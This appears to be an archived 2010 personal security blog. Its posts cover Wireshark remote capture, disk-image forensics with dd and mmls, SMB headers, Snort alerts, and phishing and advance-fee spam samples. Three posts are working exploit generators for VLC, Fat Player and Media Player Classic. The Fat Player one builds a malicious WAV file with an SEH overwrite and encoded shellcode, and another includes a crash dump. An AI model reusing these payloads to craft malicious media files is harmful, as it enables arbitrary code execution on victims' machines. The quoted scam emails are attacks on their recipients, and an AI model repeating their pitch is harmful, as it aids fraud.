Monday, November 29, 2010

Wireshark: Remote Packet Capture, bit of Security

Wireshark/Ethereal is one of the best open source tools we have. I don't think there will be individuals working in Networking domain (especially into IDS/IPS, Firewalls etc.) and don't know Wireshark/tcpdump. Please I wanna see u guys/gals ;-)

There are many features available in Wireshark, we are going to focus on remote packet capture.

Need Wireshark Version 1.4.2 with the new WinPcap available inbuilt with it. Install this on bothe the machines, where you are going to take capture (client) and on the machine where we want to sniff the traffic(server). On Server we need to start "Remote Packet Capture Protocol v.0 (experimental)" service, which will open TCP Port 2002 on the Server.


Once the service is started, run wireshark on the Client machine. Goto Capture->Options. Clicking Options will pop up a window shown below.


In this window we can see Interface field on the top left corner which has drop down menu, from this menu select "Remote" option which will pop one more window asking for details like Host: (Enter IP Address), Port:, enter 2002 here.

Authentication:

For logging onto Server to take packet capture we need to successfully authenticate to server.



Under Authentication, opt for Password authentication, Null authentication is not supported which might throw below error.


Once the Authentication is successfull you can select one of the interfaces on the Server if there are multiple for sniffing.



Security:

Well, this is one of the awesome features Wireshark has given to its users. But the downside is, log in credentials traversing the network in clear text. Atleast they would have provided basic encryption/ encoding techniques to hide password.


Exposing all the interfaces of a multi homed Server, it's IP Addresses etc.


Hope this post and feature will be very helpful for you :-)

Following articles might be of your interest
http://darshanams.blogspot.in/2012/05/cain-and-abel-password-cracking.html
http://darshanams.blogspot.in/2011/09/portable-document-files.html
http://darshanams.blogspot.in/2010/09/forensics-1-extracting-image.html
http://darshanams.blogspot.in/2011/05/snort-logging-alerts-to-syslog-server.html

Saturday, October 2, 2010

Forensics 2: Identifying File System and Extracting it

The advantages of analyzing disk images are that the investigators can:
a) preserve the digital crime-scene
b) obtain the information in slack space
c) access unallocated space, free space, and used space
d) recover file fragments, hidden or deleted files and directories
e) view the partition structure and
f) get date-stamp and ownership of files and folders.

Here we will try to concentrate on extracting the File System if any from the image for analysis available from the Crime Scene.

Lets check the md5 hash of the image under analysis for integrity purposes. The md5 hash algorithm produces a 128 bit “fingerprint” of a file, also known as a message digest. To view the md5 hash value assigned to a given file, the md5sum utility can be used.Lets check the file type of the image under analysis by using file command. The file command works by testing “arguments” within a file, and will then classify the file as whichever file type the file command sees fit. We see from the output of the file command that the image file contains an x86 boot sector. The boot sector of a computer is a primary starting point for an OS. The operating system will start at the boot loader, and the machine will read the first 512 bytes of the disk, which is known as the boot sector. The first 512 Bytes (boot sector) will be loaded into memory and will then be executed. This will initiate the boot process.

The x86 boot sector type message was obtained because the magic number 0xAA55 value is located at the 0x1FE offset within the image; defined in the file “/usr/share/file/magic” which is used by file command.

Determining the File System type of the Image
Lets run mmls utility to determine the File System type of the given image extracted by using dd command as shown below.-t Specify the media management type (dos, mac, bsd etc)

We see above that the NTFS (New Technology File System) partition begins at sector 63 (to see this look at the last column in the row where it says NTFS (0x07). Now look to the left in the start column of the row NTFS and we can see the value 0000000063). So for all the Sleuth Kit commands we need to specify an offset of 63 if the file used is raw image.
MMLS is a forensics utility that query’s an image file, and prints the partition tables and disk labels. This command is very useful when attempting to determine at which sector a partition begins and ends. We see that there is a NTFS file system on this image. We use the –t dos switch to tell mmls to utilize a dos based architecture for the file system.


File system is extracted using dd.exe command. Input file is the raw image collected from the machine which is under forensic investigation. Block size used to extract File system is 512 bytes and skipped 62 sectors because our NTFS File System is starting after those sectors.

Thus extracted File System image can be mounted by using mount command, we can check the mounted File System using fdisk -l command.




After extracting the image calculate md5 of the extracted NTFS File System image for integrity purposes.



Extracting the File System from the image


-b partition sizes in bytes
-r Recurse into DOS partitions and look for other partition tables.
-v verbose

Tuesday, September 14, 2010

Forensics 1: Extracting an Image for Investigation

Forensic investigations are usually performed on Static Data (images). Many open source (TSK) and commercial tools (Encase) are available for forensic analysis of a given image.
Lets look at how to take the image of a drive, hard disk, partition etc. Few tools which can be used are dd, windd etc.
Well, what is an image? Image is a bit-by-bit copy of the Hard Disk.
I used dd.exe command for taking the image of the computer under investigation.
dd command is found by default in Linux. On windows we can obtain the binary from The Sleuth Kit (TSK) or comes by default if Cygwin is installed.
First, lets list all the available drives (A:, B:, C: etc.,) or partitions on the machine where we want to collect image.
Below is the snapshot of the dd command used for extracting the image for investigation.
We should be very cautious while collecting the image for investigation because nothing should be changed on the machine under analysis. So most of the time we should use CD with all the tools and redirect the image to external drive or network share for saving rather than saving the image on local machine.
dd command can also be used to extract a File System from Raw image.
This is just a high level overview of Forensics will come up with more articles.
For further reading you can start from
http://en.wikipedia.org/wiki/Computer_forensics

Tuesday, August 10, 2010

VLC 1.0.5 M3U File Processing Stack Buffer Overflow

print "VLC 1.0.5 M3U File Processing Stack Buffer Overflow"

handler = "ftp://"
buff = "D" * 134000

mal_buff = handler + buff

try:
vlcm3u = open ("vlcm3u_mem_corru.m3u","w")
vlcm3u.write(mal_buff) vlcm3u.close()
print "\nMalicious M3U File Created . . . !!"
print "[+] Coded by Praveen Darshanam"
except:
print "\nUnable to Create File\n"

Fat Player 0.6b WAV File Processing Buffer Overflow (SEH)

#################################################################################################
# Stack-based buffer overflow in Fat Player 0.6b allows remote attackers to execute
# arbitrary code via a long string in a .wav file. NOTE: some of these details are
# obtained from third party information.
#
# Reference:# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4962
# http://xforce.iss.net/xforce/xfdb/52713
# http://sourceforge.net/projects/fatplayer/
# http://www.exploit-db.com/exploits/9495/
## Tested on: Windows XP SP3, FatPlayer 0.6b
#
#
# This was strictly written for educational purpose. Use it at your own risk.
# Author will not bare any responsibility for any damages watsoever.
#
# Author: Praveen Darshanam# Email: praveen[underscore]recker[at]sify.com
# Blog: http://darshanams.blogspot.com
# Date: 10th August, 2010
#
#
#################################################################################################

print "\nFat Player 0.6b WAV File Processing Buffer Overflow (SEH)"

buff1 = "D" * 4132
nseh = "\xeb\x06\x90\x90"
seh_ppr = "\x39\x1f\xd1\x72"
#0x72D11F39 pop edi - pop - retbis msacm32.drv

noop = "\x90" * 10
code2exec = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca")

buff2 = "Z" * (40000 - len(buff1) - len(nseh) - len(seh_ppr) - len(noop) - len(code2exec))
mal_buff = buff1 + nseh + seh_ppr + noop + code2exec + buff2
try:
fatpwav = open ("fatplayerboseh.wav","w")
fatpwav.write(mal_buff)
fatpwav.close()
print "\nMalicious WAV File Created . . . !!"
print "[+] Coded by Praveen Darshanam"except: print "\nUnable to Create File\n"

Thursday, July 22, 2010

Media Player Classic - Home Cinema 1.3.1333.0 M3U File Heap Overflow/DoS (0-Day)

# Vulnerability Found: Praveen Darshanam
# Coded: Praveen Darshanam
# Greetz to all Andhra Hackers and ICW Members
# http://www.darshanams.blogspot.com
##########PoC Start################

print("\n*****Program need to be run on Python 3.1*****")
print ("""Media Player Classic - Home Cinema 1.3.1333.0 M3U File DoS 
         (0-Day)\r\n\r\nTested on:\nWindows XP SP3\n
         Media Player Classic - Home Cinema\n\t\t 
         Build number: 1.3.1333.0\n\t\t
         MPC Compiler: VS 2008\n\t\t  FFmpeg Compiler: GCC 4.4.1\n""")

head = "EXTM3U"
buf = "D" * 1000
mal_buf = head + buf
#print ("mal_buf:",mal_buf)
try:
    mpc_mal = open("mpc_m3u_crash.m3u",'w')
    mpc_mal.write (mal_buf)
    mpc_mal.close()
    print ("File Created Successfully: mpc_m3u_crash.m3u\n")
except:
    print ("Cannnot Create M3U File\n")

print ("[+] Found and Coded by: Praveen Darshanam\r\n")
##########PoC End################

When the M3U file is around 1000 bytes following "C++ Runtime Error Exception" is thrown .


If the buffer is increased further Media Player Classic shows below error but doesn't crash.


Playing with M3U file sizes between 950 bytes to 2000 bytes will throw above Exceptions and lead to Crashes occassionally. Crash report with C++ Exception is shown below.

--------------CRASH REPORT START----------------------
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll
ModLoad: 73ee0000 73ee4000 C:\WINDOWS\system32\KsUser.dll
ModLoad: 10000000 100fb000 C:\Program Files\K-Lite Codec Pack\Filters\vsfilter.dll
ModLoad: 590b0000 590ce000 C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000 C:\WINDOWS\system32\MPR.dll
ModLoad: 6bf50000 6bfcd000 C:\WINDOWS\system32\dxmasf.dll
ModLoad: 02530000 0257f000 C:\WINDOWS\system32\DRMClien.DLL
(6dc.cec): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=01c2f36c edi=003fd08c
eip=7c812aeb esp=01c2f2e0 ebp=01c2f334 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
kernel32!RaiseException+0x52:
7c812aeb 5e pop esi
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:004> g
WARNING: Continuing a non-continuable exception
(6dc.cec): Break instruction exception - code 80000003 (first chance)
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=00000000 edi=003fd08c
eip=0071d14b esp=01c2f37c ebp=01c2f39c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mpc_hc+0x31d14b:
0071d14b cc int 3

-----------CRASH REPORT END-------------------

Monday, July 12, 2010

Server Message Block (SMB) Protocol Dissection

Primary goal of SMB is File Transfer within LAN.

SMB Header Structure:
SMB_Header
{
UCHAR Protocol[4];
UCHAR Command;
SMB_ERROR Status;
UCHAR Flags;
USHORT Flags2;
USHORT PIDHigh;
UCHAR SecurityFeatures[8];
USHORT Reserved;
USHORT TID;
USHORT PIDLow;
USHORT UID;
USHORT MID;
}

SMB Parameter Block:

SMB_Parameters
{
UCHAR WordCount;
USHORT Words[WordCount] (variable);
}


SMB Data Block:
SMB_Data
{
USHORT ByteCount;
UCHAR Bytes[ByteCount] (variable);
}


For further details
http://msdn.microsoft.com/en-us/library/ee441466%28v=PROT.13%29.aspx
http://www.hsc.fr/ressources/articles/win_net_srv/

Monday, June 28, 2010

Snort Preprocessors and Alerts



Snort Preprocessors

Preprocessors were introduced in Snort v1.5. Preprocessor code is run before the detection engine is called, but after the packet has been decoded. The packet can be modified or analyzed in an out-of-band manner using this mechanism. Preprocessors help in identifying possible attack packets before rules are applied, after the preprocessing stage various rules are applied on the packets (raw data) for detecting attacks based on the pattern matches. Preprocessors need to be configured from snort.conf file which can be found at /etc/ or /etc/snort/. frag2 should be commented if frag3 is used and stream4 is commented if stream5 is used.

preprocessor frag2
preprocessor frag3 // IP packet reassembly or defragmentation
preprocessor stream4: detect_scans
preprocessor stream4_reassemble
preprocessor stream5 // TCP Segmentation reassembly, stateful protocol analysis
preprocessor http_decode // http normalization of url-encoded data
preprocessor rpc_decode
preprocessor bo // back orifice backdoor traffic detection
preprocessor telnet_decode
preprocessor sf_portscan // detects various portscans
preprocessor sf_ssh
preprocessor sf_smtp
preprocessor sf_ftptelnet
preprocessor sf_dns
preprocessor sf_dcerpc
preprocessor sf_ssl

Snort also has Postprocessors or output plug-ins. These are the snort processors/plug-ins that determine what to do after traffic is identified as malicious based on pre-processors or rules. Popular post-processors are those that send snort alerts and log data to databases; those which allow SNMP event messaging etc.


Snort Alerts

Snort alerts logged onto a logfile look like (there may be different alerts in your environment)
[**] [1:2050:14] SQL version overflow attempt [**]
[**] [1:8428:9] WEB-MISC SSLv2 openssl get shared ciphers overflow attempt [**]
[**] [122:3:0] (portscan) TCP Portsweep [**]
[**] [119:4:1] (http_inspect) BARE BYTE UNICODE ENCODING [**]

The first number (1, 122, 119 here) is the Generator ID, this tells the user what component of Snort generated this alert. List of GIDs can be found at etc/generators in the Snort source.

Generators file has the format shown below
generatorid || alertid || MSG
Below diagram shows the generator id, alert id or snort id and alert name.


<!--[if !vml]-->
<!--[if !vml]--><!--[endif]-->
Any alert under ARP Spoofing and spp_fnord will have a Generator ID's of 112 and 114 respectively.

<!--[endif]-->
The second number (2050, 8428, 3, 4 here) is the Snort ID (or Signature ID). For a list of preprocessor SIDs, please see etc/gen-msg.map. Rule-based SIDs are written directly into the rules with the “sid” option.

The third number (14, 9, 0, 1 from above alerts) is the revision ID. This number is primarily used when writing signatures, as each re-edition or fine tuning of the rule should increment this number with the “rev” option. e.g. " SQL version overflow attempt" signature is modified 14 times !!!

For detailed description of various concepts refer SnortTM Users Manual.


 

Friday, June 11, 2010

twitter Phishing

This was a Phishing mail related to twitter in my SPAM box, out of curiosity I opened this mail to dig deeper. Sample mail cam be seen in the picture below.


When you take mouse over the URL in the mail or on to "Twitter Support" link we can see the Phishing URL.

http://84.51.21.51/~chatliam/mepw.html

Opening the link will redirect us to

http://tirearoma.com/

Didn't find anything malicious in the tirearoma.com page. The Phishing might be just to increase hits to "tirearoma.com", pay-per-click !!!

The redirected page has plethora of capsules related to Viagra etc. etc.


Happy browsing !!!

Wednesday, June 2, 2010

First Vulnerability I Found: CVE-2010-2091

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2091

http://xforce.iss.net/xforce/xfdb/58835

http://www.securityfocus.com/archive/1/archive/1/511401/100/0/threaded

http://www.exploit-db.com/exploits/12728

Tuesday, May 11, 2010

SPAM Mails: Part 2

Following is the SPAM mail which most of us has received and many ended up in replying to it.

Dearest One,


Good a thing to write you. I have a proposal for you; this however is not
mandatory nor will I in any manner compels you to honour against your
will.

I am Aisha Al- Salam, 23years old and the only daughter of my late
parents Mr.and Mrs.Hassan Al-salam my father was a highly reputable
business magnet - (a cocoa merchant) who operated in the capital of Cote
D Ivorie during his days.

It is sad to say that he passed away mysteriously in France during one of
his business trips abroad year 12th.Febuary 2007. Though his sudden death
was linked or rather suspected to have been masterminded by an uncle of
his who travelled with him at that time. But God knows the truth! My
mother left me when I was just 4 years old, and since then my father took
me so special.

Before his death on February 12th 2007 he called his secretary who
accompanied him to the hospital and told him that he has the sum of 7.5
million, United States Dollars.(USD$7,500.000 ) left in one of the
Leading Bank in Cote D Ivorie and he deposited the money in my name in
the bank as the next kins.

I am just 23 years old and a university undergraduate and really don't
know what to do. Now I want a foreign partner overseas where I can
transfer this fund. This is because I have suffered a lot of set backs as
a result of incessant political crisis here in Cote D Ivorie . The death
of my father actually brought sorrow to my life.

Sir, I am in a sincere desire of your humble assistance in this
regards.Your suggestions and ideas will be highly regarded. Now permit me
to ask these few questions:-

1. Can you honestly help me as your daughter?
2. Can I completely trust you?
I have decided to offer you 30% of the total amount for your willingness
to help me, Please kindly response to my mail immediately with your full
personal information, telephone number so that I can call and speak with
you on the telephone.

Please, consider this and get back to me as soon as possible.

Thank you so much.
Insallah .

My sincere regards,
Ms Aisha Al Salam.

SPAM Mails: Part 1

Below is the SPAM mail which I received in my INBOX. To make it realistic spammers had gone one step ahead and provided with contact numbers and few images to make it realistic and entice users to give their personal information.

FROM THE DESK OF THE DIRECTOR:
UK INTERNATIONAL LOTTERY PRIZE AWARD DEPT

WINNING NOTIFICATION FOR CATEGORY "A" WINNER ONLY

Amount Won: £1,000,000.00 Pounds

Dear Lucky winner,

We are glad to inform you that you have won a prize money of One Million
Great Britain Pound Sterlings (£1,000,000.00) in our last lottery promotional
draw.

We are pleased to inform you of the final announcement of the result in
UK INTERNATIONAL LOTTERY PRIZE AWARD DEPT. Your email address was selected by our Electronic Random Selection System (ERSS) from an exclusive list of e-mail addresses of individual and corporate bodies. No tickets were sold.

With Ref.Number: GP 14-M-246-04,
Batch Number: 573881545-UK/2010
Ticket Number: PP3502/8707-01.

CONGRATULATIONS!!!:
To file for Your Claims Please contact.
********************************************
Name: MR JOSEPH POUNCH
Tel:+447014275315
Email:
josephpounch18@gmail.com
*******************************************
However you will have to fill and submit this form to the events manager for
verification & direction on how you canclaim your winning fund.
Fill the Details Below:
1. Full name...............
2. Contact Address......
3. Age.........................
4. Mobile Number.........
5. Marital Status..........
6. Sex.........................
7. Occupation..............
8. Company................
9.State:......................
10.Country..................
11.Nationality...............
12.Address.................
13.Valid ID Proof (Send as email attachment)
Your Reference and Batch number at the top of this mail:

Mrs Vivian Jones.
Lottery Coordinator

Most of the netizens fall pray for this and end up providing their information. Above details can be used to crack passwords with intelligent guesses.

Before providing information in reply to such mails think once, "who the hell in this world is going to give free money !!! "